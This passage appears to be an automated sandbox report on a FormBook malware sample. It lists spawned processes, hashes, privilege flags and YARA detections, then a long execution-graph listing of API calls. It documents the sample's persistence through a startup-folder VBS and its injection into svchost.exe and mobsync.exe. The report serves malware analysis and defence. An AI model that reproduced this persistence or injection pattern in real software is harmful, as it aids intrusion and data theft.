                                                Path:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\25Lz840Dmh.exe"
                                                Imagebase:0xf0000
                                                File size:1'169'920 bytes
                                                MD5 hash:6C35B069B37095A1788E5C7B51A60E97
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 74%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:15:05:54
                                                Start date:10/01/2025
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\25Lz840Dmh.exe"
                                                Imagebase:0x690000
                                                File size:46'504 bytes
                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1865888843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1866274601.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1866670350.0000000004150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:15:06:05
                                                Start date:10/01/2025
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs"
                                                Imagebase:0x7ff67efa0000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:15:06:06
                                                Start date:10/01/2025
                                                Path:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe"
                                                Imagebase:0xf0000
                                                File size:1'169'920 bytes
                                                MD5 hash:6C35B069B37095A1788E5C7B51A60E97
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:13
                                                Start time:15:06:09
                                                Start date:10/01/2025
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe"
                                                Imagebase:0x690000
                                                File size:46'504 bytes
                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.1903592884.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:14
                                                Start time:16:19:48
                                                Start date:10/01/2025
                                                Path:C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe"
                                                Imagebase:0x2e0000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2542858222.0000000003120000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:15
                                                Start time:16:19:53
                                                Start date:10/01/2025
                                                Path:C:\Windows\SysWOW64\mobsync.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                Imagebase:0x1a0000
                                                File size:93'696 bytes
                                                MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2542862112.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2539169522.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2543006411.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:18
                                                Start time:16:20:05
                                                Start date:10/01/2025
                                                Path:C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe"
                                                Imagebase:0x2e0000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2542692952.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:20
                                                Start time:16:20:20
                                                Start date:10/01/2025
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff722870000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:3.7%
                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                  Signature Coverage:6.4%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:55
                                                  execution_graph 104141 bf107d 104146 bf708b 104141->104146 104143 bf108c 104177 c12d40 104143->104177 104147 bf709b __write_nolock 104146->104147 104180 bf7667 104147->104180 104151 bf715a 104192 c1050b 104151->104192 104158 bf7667 59 API calls 104159 bf718b 104158->104159 104211 bf7d8c 104159->104211 104161 bf7194 RegOpenKeyExW 104162 c2e8b1 RegQueryValueExW 104161->104162 104167 bf71b6 Mailbox 104161->104167 104163 c2e943 RegCloseKey 104162->104163 104164 c2e8ce 104162->104164 104163->104167 104170 c2e955 _wcscat Mailbox __NMSG_WRITE 104163->104170 104215 c10db6 104164->104215 104166 c2e8e7 104225 bf522e 104166->104225 104167->104143 104168 bf79f2 59 API calls 104168->104170 104170->104167 104170->104168 104176 bf3f74 59 API calls 104170->104176 104237 bf7de1 104170->104237 104172 c2e90f 104228 bf7bcc 104172->104228 104174 c2e929 104174->104163 104176->104170 104302 c12c44 104177->104302 104179 bf1096 104181 c10db6 Mailbox 59 API calls 104180->104181 104182 bf7688 104181->104182 104183 c10db6 Mailbox 59 API calls 104182->104183 104184 bf7151 104183->104184 104185 bf4706 104184->104185 104241 c21940 104185->104241 104188 bf7de1 59 API calls 104189 bf4739 104188->104189 104243 bf4750 104189->104243 104191 bf4743 Mailbox 104191->104151 104193 c21940 __write_nolock 104192->104193 104194 c10518 GetFullPathNameW 104193->104194 104195 c1053a 104194->104195 104196 bf7bcc 59 API calls 104195->104196 104197 bf7165 104196->104197 104198 bf7cab 104197->104198 104199 bf7cbf 104198->104199 104200 c2ed4a 104198->104200 104265 bf7c50 104199->104265 104270 bf8029 104200->104270 104203 bf7173 104205 bf3f74 104203->104205 104204 c2ed55 __NMSG_WRITE _memmove 104206 bf3f82 104205->104206 104210 bf3fa4 _memmove 104205->104210 104208 c10db6 Mailbox 59 API calls 104206->104208 104207 c10db6 Mailbox 59 API calls 104209 bf3fb8 104207->104209 104208->104210 104209->104158 104210->104207 104212 bf7da6 104211->104212 104214 bf7d99 104211->104214 104213 c10db6 Mailbox 59 API calls 104212->104213 104213->104214 104214->104161 104218 c10dbe 104215->104218 104217 c10dd8 104217->104166 104218->104217 104220 c10ddc std::exception::exception 104218->104220 104273 c1571c 104218->104273 104290 c133a1 DecodePointer 104218->104290 104291 c1859b RaiseException 104220->104291 104222 c10e06 104292 c184d1 58 API calls _free 104222->104292 104224 c10e18 104224->104166 104226 c10db6 Mailbox 59 API calls 104225->104226 104227 bf5240 RegQueryValueExW 104226->104227 104227->104172 104227->104174 104229 bf7bd8 __NMSG_WRITE 104228->104229 104230 bf7c45 104228->104230 104232 bf7bee 104229->104232 104233 bf7c13 104229->104233 104231 bf7d2c 59 API calls 104230->104231 104236 bf7bf6 _memmove 104231->104236 104301 bf7f27 59 API calls Mailbox 104232->104301 104234 bf8029 59 API calls 104233->104234 104234->104236 104236->104174 104238 bf7df0 __NMSG_WRITE _memmove 104237->104238 104239 c10db6 Mailbox 59 API calls 104238->104239 104240 bf7e2e 104239->104240 104240->104170 104242 bf4713 GetModuleFileNameW 104241->104242 104242->104188 104244 c21940 __write_nolock 104243->104244 104245 bf475d GetFullPathNameW 104244->104245 104246 bf477c 104245->104246 104247 bf4799 104245->104247 104249 bf7bcc 59 API calls 104246->104249 104248 bf7d8c 59 API calls 104247->104248 104250 bf4788 104248->104250 104249->104250 104253 bf7726 104250->104253 104254 bf7734 104253->104254 104257 bf7d2c 104254->104257 104256 bf4794 104256->104191 104258 bf7d43 _memmove 104257->104258 104259 bf7d3a 104257->104259 104258->104256 104259->104258 104261 bf7e4f 104259->104261 104262 bf7e5f _memmove 104261->104262 104263 bf7e62 104261->104263 104262->104258 104264 c10db6 Mailbox 59 API calls 104263->104264 104264->104262 104266 bf7c5f __NMSG_WRITE 104265->104266 104267 bf8029 59 API calls 104266->104267 104268 bf7c70 _memmove 104266->104268 104269 c2ed07 _memmove 104267->104269 104268->104203 104271 c10db6 Mailbox 59 API calls 104270->104271 104272 bf8033 104271->104272 104272->104204 104274 c15797 104273->104274 104281 c15728 104273->104281 104299 c133a1 DecodePointer 104274->104299 104276 c1579d 104300 c18b28 58 API calls __getptd_noexit 104276->104300 104279 c1575b RtlAllocateHeap 104279->104281 104289 c1578f 104279->104289 104281->104279 104282 c15733 104281->104282 104283 c15783 104281->104283 104287 c15781 104281->104287 104296 c133a1 DecodePointer 104281->104296 104282->104281 104293 c1a16b 58 API calls __NMSG_WRITE 104282->104293 104294 c1a1c8 58 API calls 5 library calls 104282->104294 104295 c1309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104282->104295 104297 c18b28 58 API calls __getptd_noexit 104283->104297 104298 c18b28 58 API calls __getptd_noexit 104287->104298 104289->104218 104290->104218 104291->104222 104292->104224 104293->104282 104294->104282 104296->104281 104297->104287 104298->104289 104299->104276 104300->104289 104301->104236 104303 c12c50 __freefls@4 104302->104303 104310 c13217 104303->104310 104309 c12c77 __freefls@4 104309->104179 104327 c19c0b 104310->104327 104312 c12c59 104313 c12c88 DecodePointer DecodePointer 104312->104313 104314 c12cb5 104313->104314 104315 c12c65 104313->104315 104314->104315 104373 c187a4 59 API calls 2 library calls 104314->104373 104324 c12c82 104315->104324 104317 c12d18 EncodePointer EncodePointer 104317->104315 104318 c12cec 104318->104315 104322 c12d06 EncodePointer 104318->104322 104375 c18864 61 API calls __realloc_crt 104318->104375 104319 c12cc7 104319->104317 104319->104318 104374 c18864 61 API calls __realloc_crt 104319->104374 104322->104317 104323 c12d00 104323->104315 104323->104322 104376 c13220 104324->104376 104328 c19c1c 104327->104328 104329 c19c2f EnterCriticalSection 104327->104329 104334 c19c93 104328->104334 104329->104312 104331 c19c22 104331->104329 104358 c130b5 58 API calls 3 library calls 104331->104358 104335 c19c9f __freefls@4 104334->104335 104336 c19ca8 104335->104336 104338 c19cc0 104335->104338 104359 c1a16b 58 API calls __NMSG_WRITE 104336->104359 104343 c19ce1 __freefls@4 104338->104343 104362 c1881d 58 API calls 2 library calls 104338->104362 104339 c19cad 104360 c1a1c8 58 API calls 5 library calls 104339->104360 104342 c19cd5 104345 c19ceb 104342->104345 104346 c19cdc 104342->104346 104343->104331 104344 c19cb4 104361 c1309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104344->104361 104348 c19c0b __lock 58 API calls 104345->104348 104363 c18b28 58 API calls __getptd_noexit 104346->104363 104350 c19cf2 104348->104350 104352 c19d17 104350->104352 104353 c19cff 104350->104353 104365 c12d55 104352->104365 104364 c19e2b InitializeCriticalSectionAndSpinCount 104353->104364 104356 c19d0b 104371 c19d33 LeaveCriticalSection _doexit 104356->104371 104359->104339 104360->104344 104362->104342 104363->104343 104364->104356 104366 c12d87 _free 104365->104366 104367 c12d5e RtlFreeHeap 104365->104367 104366->104356 104367->104366 104368 c12d73 104367->104368 104372 c18b28 58 API calls __getptd_noexit 104368->104372 104370 c12d79 GetLastError 104370->104366 104371->104343 104372->104370 104373->104319 104374->104318 104375->104323 104379 c19d75 LeaveCriticalSection 104376->104379 104378 c12c87 104378->104309 104379->104378 104380 c2fe27 104393 c0f944 104380->104393 104382 c2fe3d 104383 c2fe53 104382->104383 104384 c2febe 104382->104384 104482 bf9e5d 60 API calls 104383->104482 104402 bffce0 104384->104402 104386 c2fe92 104388 c2fe9a 104386->104388 104389 c3089c 104386->104389 104483 c5834f 59 API calls Mailbox 104388->104483 104484 c59e4a 89 API calls 4 library calls 104389->104484 104392 c2feb2 Mailbox 104394 c0f950 104393->104394 104395 c0f962 104393->104395 104485 bf9d3c 60 API calls Mailbox 104394->104485 104397 c0f991 104395->104397 104398 c0f968 104395->104398 104486 bf9d3c 60 API calls Mailbox 104397->104486 104399 c10db6 Mailbox 59 API calls 104398->104399 104401 c0f95a 104399->104401 104401->104382 104487 bf8180 104402->104487 104404 bffd3d 104405 c3472d 104404->104405 104453 c006f6 104404->104453 104492 bff234 104404->104492 104610 c59e4a 89 API calls 4 library calls 104405->104610 104409 c34742 104410 c3488d 104410->104409 104414 bffe4c 104410->104414 104616 c6a2d9 85 API calls Mailbox 104410->104616 104411 bffe3e 104411->104410 104411->104414 104614 c466ec 59 API calls 2 library calls 104411->104614 104412 c00517 104419 c10db6 Mailbox 59 API calls 104412->104419 104413 c347d7 104413->104409 104612 c59e4a 89 API calls 4 library calls 104413->104612 104422 c348f9 104414->104422 104469 c34b53 104414->104469 104496 bf837c 104414->104496 104417 c10db6 59 API calls Mailbox 104443 bffdd3 104417->104443 104429 c00545 _memmove 104419->104429 104420 c34848 104615 c460ef 59 API calls 2 library calls 104420->104615 104430 c34917 104422->104430 104618 bf85c0 59 API calls Mailbox 104422->104618 104425 c34755 104425->104413 104611 bff6a3 341 API calls 104425->104611 104427 c348b2 Mailbox 104427->104414 104617 c466ec 59 API calls 2 library calls 104427->104617 104436 c10db6 Mailbox 59 API calls 104429->104436 104434 c34928 104430->104434 104619 bf85c0 59 API calls Mailbox 104430->104619 104431 bffea4 104439 c34ad6 104431->104439 104440 bfff32 104431->104440 104475 c00179 Mailbox _memmove 104431->104475 104432 c3486b 104435 bf9ea0 341 API calls 104432->104435 104434->104475 104620 c460ab 59 API calls Mailbox 104434->104620 104435->104410 104480 c00106 _memmove 104436->104480 104629 c59ae7 60 API calls 104439->104629 104441 c10db6 Mailbox 59 API calls 104440->104441 104446 bfff39 104441->104446 104443->104409 104443->104411 104443->104412 104443->104417 104443->104425 104443->104429 104457 c3480c 104443->104457 104584 bf9ea0 104443->104584 104446->104453 104503 c009d0 104446->104503 104447 c34a4d 104448 bf9ea0 341 API calls 104447->104448 104450 c34a87 104448->104450 104450->104409 104624 bf84c0 104450->104624 104452 bfffb2 104452->104429 104452->104453 104460 bfffe6 104452->104460 104609 c59e4a 89 API calls 4 library calls 104453->104609 104613 c59e4a 89 API calls 4 library calls 104457->104613 104459 c34ab2 104628 c59e4a 89 API calls 4 library calls 104459->104628 104467 c00007 104460->104467 104630 bf8047 104460->104630 104461 c10db6 59 API calls Mailbox 104461->104475 104466 c00398 104466->104392 104467->104453 104468 c34b24 104467->104468 104471 c0004c 104467->104471 104634 bf9d3c 60 API calls Mailbox 104468->104634 104469->104409 104635 c59e4a 89 API calls 4 library calls 104469->104635 104471->104453 104471->104469 104472 c000d8 104471->104472 104580 bf9d3c 60 API calls Mailbox 104472->104580 104474 c34a1c 104477 c10db6 Mailbox 59 API calls 104474->104477 104475->104447 104475->104453 104475->104459 104475->104461 104475->104466 104475->104474 104582 bf8740 68 API calls __cinit 104475->104582 104583 bf8660 68 API calls 104475->104583 104621 c55937 68 API calls 104475->104621 104622 bf89b3 69 API calls Mailbox 104475->104622 104623 bf9d3c 60 API calls Mailbox 104475->104623 104476 c000eb 104476->104453 104581 bf82df 59 API calls Mailbox 104476->104581 104477->104447 104480->104475 104481 c00162 104480->104481 104608 bf9c90 59 API calls Mailbox 104480->104608 104481->104392 104482->104386 104483->104392 104484->104392 104485->104401 104486->104401 104488 bf818f 104487->104488 104491 bf81aa 104487->104491 104489 bf7e4f 59 API calls 104488->104489 104490 bf8197 CharUpperBuffW 104489->104490 104490->104491 104491->104404 104493 bff251 104492->104493 104494 bff272 104493->104494 104636 c59e4a 89 API calls 4 library calls 104493->104636 104494->104443 104497 bf838d 104496->104497 104498 c2edbd 104496->104498 104499 c10db6 Mailbox 59 API calls 104497->104499 104500 bf8394 104499->104500 104501 bf83b5 104500->104501 104637 bf8634 59 API calls Mailbox 104500->104637 104501->104422 104501->104431 104504 c34cc3 104503->104504 104516 c009f5 104503->104516 104699 c59e4a 89 API calls 4 library calls 104504->104699 104506 c00ce4 104507 c00cfa 104506->104507 104696 c01070 10 API calls Mailbox 104506->104696 104507->104452 104509 c00ee4 104509->104507 104511 c00ef1 104509->104511 104697 c01093 341 API calls Mailbox 104511->104697 104512 c00a4b PeekMessageW 104533 c00a05 Mailbox 104512->104533 104515 c00ef8 LockWindowUpdate DestroyWindow GetMessageW 104515->104507 104518 c00f2a 104515->104518 104516->104533 104700 bf9e5d 60 API calls 104516->104700 104701 c46349 341 API calls 104516->104701 104517 c34e81 Sleep 104517->104533 104520 c35c58 TranslateMessage DispatchMessageW GetMessageW 104518->104520 104520->104520 104521 c35c88 104520->104521 104521->104507 104522 bf9e5d 60 API calls 104522->104533 104523 c00e43 PeekMessageW 104523->104533 104524 c00ea5 TranslateMessage DispatchMessageW 104524->104523 104525 c34d50 TranslateAcceleratorW 104525->104523 104525->104533 104526 c3581f WaitForSingleObject 104526->104533 104534 c3583c GetExitCodeProcess CloseHandle 104526->104534 104528 c10db6 59 API calls Mailbox 104528->104533 104529 c00d13 timeGetTime 104529->104533 104530 c00e5f Sleep 104539 c00e70 Mailbox 104530->104539 104531 bf8047 59 API calls 104531->104533 104532 bf7667 59 API calls 104532->104539 104533->104506 104533->104512 104533->104517 104533->104522 104533->104523 104533->104524 104533->104525 104533->104526 104533->104528 104533->104529 104533->104530 104533->104531 104535 c35af8 Sleep 104533->104535 104537 bfb73c 314 API calls 104533->104537 104533->104539 104540 c00f95 104533->104540 104542 c00f4e timeGetTime 104533->104542 104563 bffce0 314 API calls 104533->104563 104566 c59e4a 89 API calls 104533->104566 104568 bf84c0 69 API calls 104533->104568 104569 bf9c90 59 API calls Mailbox 104533->104569 104570 bf9ea0 314 API calls 104533->104570 104572 bf89b3 69 API calls 104533->104572 104573 c4617e 59 API calls Mailbox 104533->104573 104574 c355d5 VariantClear 104533->104574 104575 c3566b VariantClear 104533->104575 104576 bf8cd4 59 API calls Mailbox 104533->104576 104577 c35419 VariantClear 104533->104577 104578 c46e8f 59 API calls 104533->104578 104579 bf7de1 59 API calls 104533->104579 104638 bfe420 104533->104638 104645 bfe6a0 104533->104645 104676 bff460 104533->104676 104695 bf31ce IsDialogMessageW GetClassLongW 104533->104695 104702 c76018 59 API calls 104533->104702 104703 c59a15 59 API calls Mailbox 104533->104703 104704 c4d4f2 59 API calls 104533->104704 104705 bf9837 104533->104705 104723 c460ef 59 API calls 2 library calls 104533->104723 104724 bf8401 59 API calls 104533->104724 104725 bf82df 59 API calls Mailbox 104533->104725 104534->104540 104535->104539 104537->104533 104539->104532 104539->104533 104539->104540 104541 c1049f timeGetTime 104539->104541 104545 c35b8f GetExitCodeProcess 104539->104545 104551 c75f25 110 API calls 104539->104551 104552 bfb7dd 109 API calls 104539->104552 104553 c35874 104539->104553 104554 c35078 Sleep 104539->104554 104555 c35c17 Sleep 104539->104555 104557 bf7de1 59 API calls 104539->104557 104726 c52408 60 API calls 104539->104726 104727 bf9e5d 60 API calls 104539->104727 104728 bf89b3 69 API calls Mailbox 104539->104728 104729 bfb73c 341 API calls 104539->104729 104730 c464da 60 API calls 104539->104730 104731 c55244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104539->104731 104732 c53c55 66 API calls Mailbox 104539->104732 104540->104452 104541->104539 104698 bf9e5d 60 API calls 104542->104698 104547 c35ba5 WaitForSingleObject 104545->104547 104548 c35bbb CloseHandle 104545->104548 104547->104533 104547->104548 104548->104539 104551->104539 104552->104539 104553->104540 104554->104533 104555->104533 104557->104539 104563->104533 104566->104533 104568->104533 104569->104533 104570->104533 104572->104533 104573->104533 104574->104533 104575->104533 104576->104533 104577->104533 104578->104533 104579->104533 104580->104476 104581->104480 104582->104475 104583->104475 104585 bf9ebf 104584->104585 104600 bf9eed Mailbox 104584->104600 104586 c10db6 Mailbox 59 API calls 104585->104586 104586->104600 104587 bfb475 104588 bf8047 59 API calls 104587->104588 104603 bfa057 104588->104603 104589 bfb47a 104591 c30055 104589->104591 104606 c309e5 104589->104606 104590 c10db6 59 API calls Mailbox 104590->104600 105932 c59e4a 89 API calls 4 library calls 104591->105932 104595 bf8047 59 API calls 104595->104600 104596 c30064 104596->104443 104599 bf7667 59 API calls 104599->104600 104600->104587 104600->104589 104600->104590 104600->104591 104600->104595 104600->104599 104601 c46e8f 59 API calls 104600->104601 104602 c12d40 67 API calls __cinit 104600->104602 104600->104603 104604 c309d6 104600->104604 104607 bfa55a 104600->104607 105930 bfc8c0 341 API calls 2 library calls 104600->105930 105931 bfb900 60 API calls Mailbox 104600->105931 104601->104600 104602->104600 104603->104443 105934 c59e4a 89 API calls 4 library calls 104604->105934 105935 c59e4a 89 API calls 4 library calls 104606->105935 105933 c59e4a 89 API calls 4 library calls 104607->105933 104608->104480 104609->104405 104610->104409 104611->104413 104612->104409 104613->104409 104614->104420 104615->104432 104616->104427 104617->104427 104618->104430 104619->104434 104620->104475 104621->104475 104622->104475 104623->104475 104625 bf84cb 104624->104625 104626 bf84f2 104625->104626 105936 bf89b3 69 API calls Mailbox 104625->105936 104626->104459 104628->104409 104629->104460 104631 bf805a 104630->104631 104632 bf8052 104630->104632 104631->104467 105937 bf7f77 59 API calls 2 library calls 104632->105937 104634->104469 104635->104409 104636->104494 104637->104501 104639 bfe43d 104638->104639 104640 bfe451 104638->104640 104733 bfdf00 341 API calls 2 library calls 104639->104733 104734 c59e4a 89 API calls 4 library calls 104640->104734 104642 bfe448 104642->104533 104644 c33aa4 104644->104644 104646 bfe6d5 104645->104646 104647 c33aa9 104646->104647 104650 bfe73f 104646->104650 104659 bfe799 104646->104659 104648 bf9ea0 341 API calls 104647->104648 104649 c33abe 104648->104649 104675 bfe970 Mailbox 104649->104675 104736 c59e4a 89 API calls 4 library calls 104649->104736 104653 bf7667 59 API calls 104650->104653 104650->104659 104651 bf7667 59 API calls 104651->104659 104654 c33b04 104653->104654 104656 c12d40 __cinit 67 API calls 104654->104656 104655 c12d40 __cinit 67 API calls 104655->104659 104656->104659 104657 c33b26 104657->104533 104658 bf84c0 69 API calls 104658->104675 104659->104651 104659->104655 104659->104657 104660 bfe95a 104659->104660 104659->104675 104660->104675 104737 c59e4a 89 API calls 4 library calls 104660->104737 104664 bf9ea0 341 API calls 104664->104675 104666 bf8d40 59 API calls 104666->104675 104668 c59e4a 89 API calls 104668->104675 104671 bff195 104741 c59e4a 89 API calls 4 library calls 104671->104741 104673 c33e25 104673->104533 104674 bfea78 104674->104533 104675->104658 104675->104664 104675->104666 104675->104668 104675->104671 104675->104674 104735 bf7f77 59 API calls 2 library calls 104675->104735 104738 c46e8f 59 API calls 104675->104738 104739 c6c5c3 341 API calls 104675->104739 104740 c6b53c 341 API calls Mailbox 104675->104740 104742 bf9c90 59 API calls Mailbox 104675->104742 104743 c693c6 341 API calls Mailbox 104675->104743 104677 bff4ba 104676->104677 104678 bff650 104676->104678 104679 bff4c6 104677->104679 104680 c3441e 104677->104680 104681 bf7de1 59 API calls 104678->104681 104744 bff290 104679->104744 104852 c6bc6b 104680->104852 104684 bff58c Mailbox 104681->104684 104759 c53c37 104684->104759 104762 c5cb7a 104684->104762 104842 bf4e4a 104684->104842 104848 c6df37 104684->104848 104685 c3442c 104686 bff630 104685->104686 104892 c59e4a 89 API calls 4 library calls 104685->104892 104686->104533 104688 bff4fd 104688->104684 104688->104685 104688->104686 104690 bff5e3 104690->104686 104851 bf9c90 59 API calls Mailbox 104690->104851 104695->104533 104696->104509 104697->104515 104698->104533 104699->104516 104700->104516 104701->104516 104702->104533 104703->104533 104704->104533 104706 bf9851 104705->104706 104715 bf984b 104705->104715 104707 c2f5d3 __i64tow 104706->104707 104708 bf9899 104706->104708 104709 c2f4da 104706->104709 104711 bf9857 __itow 104706->104711 105928 c13698 83 API calls 4 library calls 104708->105928 104717 c10db6 Mailbox 59 API calls 104709->104717 104721 c2f552 Mailbox _wcscpy 104709->104721 104713 c10db6 Mailbox 59 API calls 104711->104713 104714 bf9871 104713->104714 104714->104715 104716 bf7de1 59 API calls 104714->104716 104715->104533 104716->104715 104718 c2f51f 104717->104718 104719 c10db6 Mailbox 59 API calls 104718->104719 104720 c2f545 104719->104720 104720->104721 104722 bf7de1 59 API calls 104720->104722 105929 c13698 83 API calls 4 library calls 104721->105929 104722->104721 104723->104533 104724->104533 104725->104533 104726->104539 104727->104539 104728->104539 104729->104539 104730->104539 104731->104539 104732->104539 104733->104642 104734->104644 104735->104675 104736->104675 104737->104675 104738->104675 104739->104675 104740->104675 104741->104673 104742->104675 104743->104675 104745 bff43a 104744->104745 104747 bff2bc 104744->104747 104894 c59e4a 89 API calls 4 library calls 104745->104894 104747->104745 104756 bff2f9 _memmove 104747->104756 104748 bff3d3 104749 bff3e3 104748->104749 104893 c6a2d9 85 API calls Mailbox 104748->104893 104749->104688 104751 c10db6 59 API calls Mailbox 104751->104756 104752 c343f9 104896 bff6a3 341 API calls 104752->104896 104754 bf9ea0 341 API calls 104754->104756 104755 c343a9 104755->104688 104756->104748 104756->104751 104756->104752 104756->104754 104756->104755 104757 c343ab 104756->104757 104895 c59e4a 89 API calls 4 library calls 104757->104895 104897 c5445a GetFileAttributesW 104759->104897 104763 bf7667 59 API calls 104762->104763 104764 c5cbaf 104763->104764 104765 bf7667 59 API calls 104764->104765 104766 c5cbb8 104765->104766 104767 c5cbcc 104766->104767 105097 bf9b3c 104766->105097 104769 bf9837 84 API calls 104767->104769 104770 c5cbe9 104769->104770 104771 c5cc0b 104770->104771 104772 c5ccea 104770->104772 104783 c5cd1a Mailbox 104770->104783 104773 bf9837 84 API calls 104771->104773 104901 bf4ddd 104772->104901 104775 c5cc17 104773->104775 104777 bf8047 59 API calls 104775->104777 104780 c5cc23 104777->104780 104778 c5cd16 104779 bf7667 59 API calls 104778->104779 104778->104783 104782 c5cd4b 104779->104782 104785 c5cc37 104780->104785 104786 c5cc69 104780->104786 104781 bf4ddd 136 API calls 104781->104778 104784 bf7667 59 API calls 104782->104784 104783->104690 104787 c5cd54 104784->104787 104788 bf8047 59 API calls 104785->104788 104789 bf9837 84 API calls 104786->104789 104790 bf7667 59 API calls 104787->104790 104791 c5cc47 104788->104791 104792 c5cc76 104789->104792 104793 c5cd5d 104790->104793 104794 bf7cab 59 API calls 104791->104794 104795 bf8047 59 API calls 104792->104795 104796 bf7667 59 API calls 104793->104796 104797 c5cc51 104794->104797 104798 c5cc82 104795->104798 104799 c5cd66 104796->104799 104800 bf9837 84 API calls 104797->104800 105101 c54a31 GetFileAttributesW 104798->105101 104802 bf9837 84 API calls 104799->104802 104804 c5cc5d 104800->104804 104803 c5cd73 104802->104803 104925 bf459b 104803->104925 104807 bf7b2e 59 API calls 104804->104807 104805 c5cc8b 104808 c5cc9e 104805->104808 104809 bf79f2 59 API calls 104805->104809 104807->104786 104811 bf9837 84 API calls 104808->104811 104817 c5cca4 104808->104817 104809->104808 104810 c5cd8e 104976 bf79f2 104810->104976 104813 c5cccb 104811->104813 105102 c537ef 75 API 